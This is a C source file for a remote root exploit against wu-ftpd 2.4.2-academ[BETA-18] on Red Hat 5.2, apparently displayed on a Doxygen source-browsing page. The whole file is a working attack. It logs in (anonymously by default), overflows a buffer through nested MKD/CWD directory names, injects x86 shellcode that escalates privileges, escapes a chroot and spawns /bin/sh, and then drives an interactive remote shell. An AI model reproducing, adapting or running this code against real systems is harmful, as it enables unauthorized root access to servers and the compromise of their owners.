Logo Search packages:      
Sourcecode: raccess version File versions  Download package

wu2.4.2a.c

/*
      THIS IS PRIVATE! DO NOT DISTRIBUTE!!!!   PRIVATE!
 
      WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1)
      for linux x86 (redhat 5.2)
 
      by duke
      duke@viper.net.au
 
      BIG thanks to stran9er for alot of help with part of the shellcode!
      i fear stran9er, but who doesn't? !@$ :)
 
      Greets to: #!ADM, el8.org users,  
      
      To exploit this remotely they need to have a directory you can
      have write privlidges to.. this is the <dir> argument.. you can
      also use this locally by specifying -l <ur login> <urpass> with the
      <dir> = your home directory or something
      -duke
*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/select.h>

#define RET 0xbfffa80f

void logintoftp();
void sh();
void mkd(char *);
int max(int, int);

char shellcode[] =
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
  "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"
  "\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed"
  "\xcd\x80\x31\xc0\x8d\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1"
  "\xd0\xff\xf7\xdb\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03"
  "\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x88\x46\x07\x89"
  "\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
  "\x80\xe8\xac\xff\xff\xff";

char tmp[256];
char name[128], pass[128];

int sockfd;

int main(int argc, char **argv)
{
  char sendln[1024], recvln[4048], buf1[800], buf2[1000];
  char *p, *q;
  int len, offset = 0, i;
  struct sockaddr_in cli;

  if(argc < 3)
    {
      printf("usage: %s <host> <dir> [-l name pass] [offset]\n", argv[0]);
      exit(0);
    }
  if(argc >= 4)
    {
      if(strcmp(argv[3], "-l") == 0)
        {
          strncpy(name, argv[4], 128);
          strncpy(pass, argv[5], 128);
        }
      else
        {
          offset = atoi(argv[3]);
        }
      if(argc == 7)
        offset = atoi(argv[6]);
    }

  if(name[0] == 0 && pass[0] == 0)
    {
      strcpy(name, "anonymous");
      strcpy(pass, "hi@blahblah.net");
    }

  bzero(&cli, sizeof(cli));
  bzero(recvln, sizeof(recvln));
  bzero(sendln, sizeof(sendln));
  cli.sin_family = AF_INET;
  cli.sin_port = htons(21);
  inet_pton(AF_INET, argv[1], &cli.sin_addr);

  if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
      perror("socket");
      exit(0);
    }

  if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
    {
      perror("connect");
      exit(0);
    }
  while((len = read(sockfd, recvln, sizeof(recvln))) > 0)
    {
      recvln[len] = '\0';
      if(strchr(recvln, '\n') != NULL)
        break;
    }
  logintoftp(sockfd);
  printf("logged in.\n");
  bzero(sendln, sizeof(sendln));

  for(i=0; i<996; i+=4)
    *(long *)&buf2[i] = RET + offset;
  memset(buf1, 0x90, 800);
  memcpy(buf1, argv[2], strlen(argv[2]));
  mkd(argv[2]);
  p = &buf1[strlen(argv[2])];
  q = &buf1[799];
  *q = '\x0';
  while(p <= q)
    {
      strncpy(tmp, p, 200);
      mkd(tmp);
      p+=200;
    }
  mkd(shellcode);
  mkd("bin");
  mkd("sh");
  p = &buf2[0];
  q = &buf2[999];
  while(p <= q)
    {
      strncpy(tmp, p, 250);
      mkd(tmp);
      p+=250;
    }
  sh(sockfd);


  close(sockfd);
  printf("finit.\n");
}

void mkd(char *dir)
{
  char snd[512], rcv[1024];
  char blah[1024], *p;
  int n;

  bzero(blah, sizeof(blah));
  p = blah;
  for(n=0; n<strlen(dir); n++)
    {
      if(dir[n] == '\xff')
        {
          *p = '\xff';
          p++;
        }
      *p = dir[n];
      p++;
    }
  sprintf(snd, "MKD %s\r\n", blah);
  write(sockfd, snd, strlen(snd));
  bzero(snd, sizeof(snd));
  sprintf(snd, "CWD %s\r\n", blah);
  write(sockfd, snd, strlen(snd));
  bzero(rcv, sizeof(rcv));
  while((n = read(sockfd, rcv, sizeof(rcv))) > 0)
    {
      rcv[n] = 0;
      if(strchr(rcv, '\n') != NULL)
        break;
    }
  return;
}

void logintoftp()
{
  char snd[1024], rcv[1024];
  int n;

  printf("logging in with %s: %s\n", name, pass);
  memset(snd, '\0', 1024);
  sprintf(snd, "USER %s\r\n", name);
  write(sockfd, snd, strlen(snd));

  while((n=read(sockfd, rcv, sizeof(rcv))) > 0)
    {
      rcv[n] = 0;
      if(strchr(rcv, '\n') != NULL)
        break;
    }

  memset(snd, '\0', 1024);
  sprintf(snd, "PASS %s\r\n", pass);
  write(sockfd, snd, strlen(snd));

  while((n=read(sockfd, rcv, sizeof(rcv))) > 0)
    {
      rcv[n] = 0;
      if(strchr(rcv, '\n') != NULL)
        break;
    }
  return;
}

void sh()
{
  char snd[1024], rcv[1024];
  fd_set rset;
  int maxfd, n;

  strcpy(snd, "cd /; uname -a; pwd; id;\n");
  write(sockfd, snd, strlen(snd));

  for(;;)
    {
      FD_SET(fileno(stdin), &rset);
      FD_SET(sockfd, &rset);
      maxfd = max(fileno(stdin), sockfd) + 1;
      select(maxfd, &rset, NULL, NULL, NULL);
      if(FD_ISSET(fileno(stdin), &rset))
        {
          bzero(snd, sizeof(snd));
          fgets(snd, sizeof(snd)-2, stdin);
          write(sockfd, snd, strlen(snd));
        }
      if(FD_ISSET(sockfd, &rset))
        {
          bzero(rcv, sizeof(rcv));
          if((n = read(sockfd, rcv, sizeof(rcv))) == 0)
            {
              printf("EOF.\n");
              exit(0);
            }
          if(n < 0)
            {
              perror("read");
              exit(-1);
            }
          fputs(rcv, stdout);
        }
    }
}

int max(int x, int y)
{
  if(x > y)
    return(x);
  return(y);
}

 

Generated by  Doxygen 1.6.0   Back to index